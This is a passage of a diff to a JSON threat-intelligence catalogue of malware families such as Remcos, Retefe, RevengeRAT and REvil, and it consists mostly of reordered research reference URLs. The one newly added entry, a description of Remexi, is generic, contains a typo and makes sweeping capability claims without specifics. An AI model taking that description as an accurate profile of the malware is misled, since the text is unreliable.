"https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns", + "https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", + "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.youtube.com/watch?v=DIH4SvKuktM", + "https://perception-point.io/behind-the-attack-remcos-rat/", + "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/", + "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine", + "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", + "https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://asec.ahnlab.com/ko/25837/", + "https://muha2xmad.github.io/mal-document/remcosdoc/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing", + "https://blog.morphisec.com/nft-malware-new-evasion-abilities", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md", + "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/", + "https://intel471.com/blog/privateloader-malware", + "https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://dissectingmalwa.re/malicious-ratatouille.html", + "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://www.connectwise.com/resources/formbook-remcos-rat", + "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html", + "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", + "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.esentire.com/blog/remcos-rat", "https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87", - "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/" + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://muha2xmad.github.io/unpacking/remcos/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://asec.ahnlab.com/en/32376/", + "https://asec.ahnlab.com/ko/32101/", + "https://secrary.com/ReversingMalware/RemcosRAT/", + "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", + "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread", + "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly", + "https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877" ], "synonyms": [ "RemcosRAT", @@ -41108,18 +43060,18 @@ "value": "Remcos" }, { - "description": "", + "description": "Remexi is a highly advanced and stealthy malware discovered in recent times. It employs sophisticated evasion techniques to infiltrate target systems and networks undetected. This malware utilizes various propagation vectors, including exploit kits, social engineering tactics, and compromised websites. Once inside a system, Remexi establishes persistence through rootkit capabilities and leverages coAmmand-and-control infrastructure to receive and execute malicious commands. It possesses keylogging and data exfiltration capabilities, enabling it to steal sensitive information such as login credentials and financial data. Additionally, Remexi can download and execute additional payloads, making it adaptable and capable of evolving its malicious activities over time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", + "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "https://securelist.com/chafer-used-remexi-malware/89538/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "https://twitter.com/QW5kcmV3/status/1095833216605401088", - "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", - "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf" + "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://twitter.com/QW5kcmV3/status/1095833216605401088" ], "synonyms": [ "CACHEMONEY" @@ -41162,11 +43114,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", - "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf", + "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html", "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html", - "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html" + "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" ], "synonyms": [], "type": [] @@ -41179,8 +43131,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html" + "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" ], "synonyms": [ "WINDSHIELD" @@ -41222,13 +43174,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", - "https://github.com/cocaman/retefe", - "https://github.com/Tomasuh/retefe-unpacker", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", - "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/", + "https://github.com/cocaman/retefe", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", + "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/", + "https://github.com/Tomasuh/retefe-unpacker", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe" ], "synonyms": [ @@ -41245,10 +43197,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro", - "https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/", "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" + "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", + "https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] @@ -41274,27 +43226,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", - "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", - "https://isc.sans.edu/diary/rss/22590", - "https://blogs.360.cn/post/APT-C-44.html", - "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", - "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", - "https://blog.reversinglabs.com/blog/rats-in-the-library", - "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", - "https://blog.reversinglabs.com/blog/dotnet-loaders", - "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://securelist.com/revengehotels/95229/", + "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", + "https://blogs.360.cn/post/APT-C-44.html", + "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", + "https://isc.sans.edu/diary/rss/22590", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/", + "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md", + "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", - "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", - "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", - "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", - "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/" + "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://blog.reversinglabs.com/blog/dotnet-loaders" ], "synonyms": [ "Revetrat" @@ -41309,12 +43261,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat", - "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", - "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/", - "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://blog.lumen.com/suspected-pakistani-actor-compromises-indian-power-company-with-new-reverserat/", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388" + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", + "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/", + "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/" ], "synonyms": [], "type": [] @@ -41340,286 +43292,286 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://unit42.paloaltonetworks.com/revil-threat-actors/", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/", - "https://twitter.com/VK_Intel/status/1374571480370061312?s=20", - "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil", - "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801", - "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", - "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", - "https://www.grahamcluley.com/travelex-paid-ransom/", - "https://www.secureworks.com/blog/revil-the-gandcrab-connection", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", - "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", - "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", - "https://asec.ahnlab.com/ko/19640/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", - "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/", - "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", - "https://www.kaseya.com/potential-attack-on-kaseya-vsa/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", - "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", - "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/", - "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", - "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422", - "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://unit42.paloaltonetworks.com/prometheus-ransomware/", - "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain", - "https://www.netskope.com/blog/netskope-threat-coverage-revil", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", - "http://www.secureworks.com/research/threat-profiles/gold-southfield", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", - "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin", - "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", - "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter", - "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", - "https://www.bbc.com/news/technology-59297187", - "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://twitter.com/Jacob_Pimental/status/1391055792774729728", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/", - "https://www.ironnet.com/blog/ransomware-graphic-blog", - "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil", - "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", - "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", - "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/", - "https://www.youtube.com/watch?v=l2P5CMH9TE0", - "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/", - "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/", - "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", - "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles", - "https://home.treasury.gov/news/press-releases/jy0471", - "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", - "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", - "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ", - "https://twitter.com/VK_Intel/status/1411066870350942213", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html", - "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html", - "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/", - "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent", - "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", - "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.cyjax.com/2021/07/09/revilevolution/", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", - "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", - "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/", - "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", - "https://www.flashpoint-intel.com/blog/revil-disappears-again/", - "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/", - "https://threatpost.com/ransomware-revil-sites-disappears/167745/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://securelist.com/ransomware-world-in-2021/102169/", - "https://twitter.com/SyscallE/status/1411074271875670022", - "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", - "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", - "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40", - "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", - "https://twitter.com/fwosar/status/1411281334870368260", - "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/", - "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/", - "https://www.kpn.com/security-blogs/Tracking-REvil.htm", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/", - "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", - "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/", - "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://www.youtube.com/watch?v=P8o6GItci5w", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", - "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions", - "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack", - "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged", - 